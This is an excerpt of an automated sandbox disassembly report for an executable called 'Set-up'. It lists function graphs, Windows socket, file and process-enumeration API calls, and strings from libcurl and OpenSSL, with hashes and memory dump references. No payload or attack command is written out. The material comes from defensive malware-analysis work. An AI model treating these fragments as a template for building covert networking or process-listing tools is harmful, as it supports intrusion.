58d43-58d61 call 3d8c0 call 5a150 1162->1170 1171 58d3b-58d3d 1162->1171 1172 58edf-58eef call 278b0 1163->1172 1173 58e9e-58eb6 call 32a00 1163->1173 1164->1139 1166->1137 1166->1148 1167->1148 1178 58bd4-58bda 1169->1178 1179 58bce-58bd2 1169->1179 1206 58d66-58d74 1170->1206 1171->1166 1171->1170 1195 58ef2-58efc 1172->1195 1173->1172 1198 58eb8-58edd call 33410 * 2 1173->1198 1187 58c51-58c58 1176->1187 1188 58c8e-58c93 1176->1188 1178->1139 1190 58bdc-58be1 1178->1190 1179->1139 1179->1178 1182->1157 1184 58e2e-58e85 call 3d090 call 64fd0 1183->1184 1185 58e28-58e2c 1183->1185 1184->1182 1185->1182 1185->1184 1187->1188 1194 58c5a-58c62 1187->1194 1199 58c99-58c9f 1188->1199 1200 58dc8-58dd9 call 5b100 1188->1200 1196 58dac-58db8 call 650a0 1190->1196 1203 58c64-58c68 1194->1203 1204 58c6a-58c70 1194->1204 1195->1164 1196->1139 1198->1195 1199->1153 1200->1166 1203->1188 1203->1204 1204->1188 1210 58c72-58c8b call 650a0 1204->1210 1206->1139 1212 58d7a-58d81 1206->1212 1210->1188 1212->1139 1216 58d87-58d8f 1212->1216 1217 58d91-58d95 1216->1217 1218 58d9b-58da1 1216->1218 1217->1139 1217->1218 1218->1139 1222 58da7 1218->1222 1222->1196
                          APIs
                          • connect.WS2_32(?,?,00000001), ref: 00058C2F
                          • WSAGetLastError.WS2_32 ref: 00058C39
                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00058CF3
                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00058D0E
                          • WSAGetLastError.WS2_32 ref: 00058D18
                          • WSASetLastError.WS2_32(00000000), ref: 00058E0C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$Sleepconnectgetsockopt
                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                          • API String ID: 2513251565-879669977
                          • Opcode ID: cd5096495c769fb1c3ecfbd4f56703ef094841b73eeb6c60d8af230d0b85fcf5
                          • Instruction ID: ada5835603e5bd636557e11d6289191296128a12180ebe69101d61f8e73ca8c8
                          • Opcode Fuzzy Hash: cd5096495c769fb1c3ecfbd4f56703ef094841b73eeb6c60d8af230d0b85fcf5
                          • Instruction Fuzzy Hash: 3FB1A070604705AFE720CF24C885BABBBF9AF45315F04C529EC59AB2D2DB71E858CB61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1340 276a0-276be 1341 276c0-276c7 1340->1341 1342 276e6-276f2 send 1340->1342 1341->1342 1343 276c9-276d1 1341->1343 1344 276f4-27709 call 272a0 1342->1344 1345 2775e-27762 1342->1345 1347 276d3-276e4 send 1343->1347 1348 2770b-27759 call 272a0 __acrt_iob_func call 2cb20 fflush _errno 1343->1348 1344->1345 1347->1344 1348->1345
                          APIs
                          • send.WS2_32( Y,?,?,?), ref: 000276DE
                          • send.WS2_32( Y,?,?,?), ref: 000276EA
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00027721
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00027745
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002774D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: send$__acrt_iob_func_errnofflush
                          • String ID: Y$LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$send
                          • API String ID: 3540913164-2201046788
                          • Opcode ID: b4dd1608f05950632359f86fb8906587d03a2cff73cd7dd459baf578f134425d
                          • Instruction ID: 9f5fce6bf631557ad823b5c2113d9b8cc6449dea3139322a33b6f8c160132896
                          • Opcode Fuzzy Hash: b4dd1608f05950632359f86fb8906587d03a2cff73cd7dd459baf578f134425d
                          • Instruction Fuzzy Hash: 2211ABB9A493247BE7105B59BC49E377FADEB85B68F040508FC0853353DA619D00C6B1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1354 1a47b0-1a47bf call 1fe5d0 1356 1a47c4-1a47dd strchr 1354->1356 1357 1a47df-1a47f2 call 19d520 1356->1357 1358 1a4824-1a485e call 1d7120 call 1d7220 GetLastError call 1d7310 _errno 1356->1358 1363 1a47f8-1a481f call 19d690 call 19df50 1357->1363 1364 1a488d-1a4896 fclose 1357->1364 1375 1a486b-1a488b call 1d7120 call 1d7220 1358->1375 1376 1a4860-1a4869 _errno 1358->1376 1371 1a48c4-1a48cb 1363->1371 1367 1a48c2 1364->1367 1367->1371 1385 1a48b8-1a48bf call 1d7310 1375->1385 1376->1375 1377 1a4898-1a48b3 call 1d7120 call 1d7220 1376->1377 1377->1385 1385->1367
                          APIs
                            • Part of subcall function 001FE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE5E2
                            • Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE5FA
                            • Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 001FE637
                            • Part of subcall function 001FE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0018A31E), ref: 001FE64D
                            • Part of subcall function 001FE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0018A31E,00000001,?,00000008,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000), ref: 001FE665
                            • Part of subcall function 001FE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE678
                            • Part of subcall function 001FE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE685
                            • Part of subcall function 001FE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE690
                            • Part of subcall function 001FE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E), ref: 001FE6A6
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,005FBED4), ref: 001A47CC
                          • GetLastError.KERNEL32(?,?,?,?,?,?,005FBED4), ref: 001A483D
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,005FBED4), ref: 001A4855
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,005FBED4), ref: 001A4860
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,005FBED4), ref: 001A488E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                          • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                          • API String ID: 3063597995-203430365
                          • Opcode ID: 9bfdce90e5864355648431ae623b93e7395d5e3e6a3f236adfeef545770fec86
                          • Instruction ID: 03beab9829b67c9837f333c1cfe6f013b36273e6047345823dd70c0ddf5ffdf8
                          • Opcode Fuzzy Hash: 9bfdce90e5864355648431ae623b93e7395d5e3e6a3f236adfeef545770fec86
                          • Instruction Fuzzy Hash: 7621C8A5F443447BE12032E03C47F3F3959DBA2B55F450025FA09A52D3FB9999154173

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                          • API String ID: 420147892-2059488242
                          • Opcode ID: 80cc6914e0fcca5fdd1934a553f4b4b3c90b518862eda58dafdddc171350d6d4
                          • Instruction ID: 13b5a6ae46e3f548dd42bbfa973e226060c3311af4db0d79fa19ea6e6ba7c8c5
                          • Opcode Fuzzy Hash: 80cc6914e0fcca5fdd1934a553f4b4b3c90b518862eda58dafdddc171350d6d4
                          • Instruction Fuzzy Hash: 4031B6B09057199BCB40EFB8D5456AEBBF4BF44304F40886DE994A7341EB789A44CF92
                          APIs
                          • recv.WS2_32(?,?,000594BF,?), ref: 000277AE
                          • recv.WS2_32(?,?,000594BF,?), ref: 000277BA
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 000277F1
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00027815
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002781D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: recv$__acrt_iob_func_errnofflush
                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                          • API String ID: 2542159810-640788491
                          • Opcode ID: 113fc4905da007ec68f38ecfe998e600258d2072cd8ed2014cdc4c29d77e07cb
                          • Instruction ID: 1d28f527f3929ff61edbd93ece8300f32008b6fa3c8fdebd34286d538c850dbb
                          • Opcode Fuzzy Hash: 113fc4905da007ec68f38ecfe998e600258d2072cd8ed2014cdc4c29d77e07cb
                          • Instruction Fuzzy Hash: 7211C8B9908364BBE7205B54FC4AE377FADEB85B68F040518F80953252DA619C00C6B1
                          APIs
                          • socket.WS2_32(?,?,?), ref: 00027618
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00027659
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0002767D
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00027685
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: __acrt_iob_func_errnofflushsocket
                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                          • API String ID: 166263346-842387772
                          • Opcode ID: ced7590ddeb5372f026b0d0f35f429ecb8b2a03edf3c7a4f76db665f53b033c3
                          • Instruction ID: 361f121aeafeb005f59ece3ffb752842014522cb820e6554d00aadae99b2fe58
                          • Opcode Fuzzy Hash: ced7590ddeb5372f026b0d0f35f429ecb8b2a03edf3c7a4f76db665f53b033c3
                          • Instruction Fuzzy Hash: 6911EC76A052216BDB115B6DBC0AFAB3FA9EF81735F040514F804962E3DA61C854D7E1
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003AD1E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno
                          • String ID: @$Inf$NaN
                          • API String ID: 2918714741-141429178
                          • Opcode ID: 86356d3f490351f4aaf8bc97fde9f094cfea3597e691f0dfbe3d62f665e51721
                          • Instruction ID: dc1ece7fda203a6414ee5d7e1a45daf3d10aabbb59be27270135b3fc8dd33db5
                          • Opcode Fuzzy Hash: 86356d3f490351f4aaf8bc97fde9f094cfea3597e691f0dfbe3d62f665e51721
                          • Instruction Fuzzy Hash: 3DF1B17560C3818BD7229F24C0407ABBBE5FB86314F158A1DE9DE8B791D735D905CB82
                          APIs
                          • WSASetLastError.WS2_32(?), ref: 0005F75B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: %s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s trying next$Connected to %s (%s) port %u
                          • API String ID: 1452528299-2219341415
                          • Opcode ID: b3de3fe739fc5d490f66613a4e19aba982034354403846b1c467322088160b67
                          • Instruction ID: 65e07e37c407bfe71f2609da703231c262bfcebf2a54f1fffb1c129b327be34d
                          • Opcode Fuzzy Hash: b3de3fe739fc5d490f66613a4e19aba982034354403846b1c467322088160b67
                          • Instruction Fuzzy Hash: B4E19F306047469FD724CF28C584B7BBBE1BF84305F14856CEC998B292D775E989CB91
                          APIs
                            • Part of subcall function 000276A0: send.WS2_32( Y,?,?,?), ref: 000276DE
                          • WSAGetLastError.WS2_32 ref: 000593C3
                            • Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2
                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0005935C
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00059388
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                          • API String ID: 1798382672-2691795271
                          • Opcode ID: 7b70c78bd36403263936e03e681676741c20876a92d5b07b57a9becefd84bd5a
                          • Instruction ID: 084738a7a6080c39a56e20121d51e5991ae27c8082df14908e6e27e975149d00
                          • Opcode Fuzzy Hash: 7b70c78bd36403263936e03e681676741c20876a92d5b07b57a9becefd84bd5a
                          • Instruction Fuzzy Hash: 7351BE70600305EBE711DF24C881FABB7A6FF88314F148529FD489B292E770E995CB91
                          APIs
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005C5FED,00000000,00000000,?,?,?,000E9882,?,00000000), ref: 000E77DD
                          • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 000E77F0
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 000E7802
                          • GetLastError.KERNEL32(?,00000000), ref: 000E780E
                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 000E7830
                          • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000E7843
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E786B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: fseek$ErrorLastfclosefopenfreadftell
                          • String ID:
                          • API String ID: 1915723720-0
                          • Opcode ID: 35ea52a1a1630f78084e03ade060ee71f87412b52f74c3e432575c0d0e44dd53
                          • Instruction ID: 736cfe0743ab36804cf4d53e3d348d49985306a958961ec5673edc0101087662
                          • Opcode Fuzzy Hash: 35ea52a1a1630f78084e03ade060ee71f87412b52f74c3e432575c0d0e44dd53
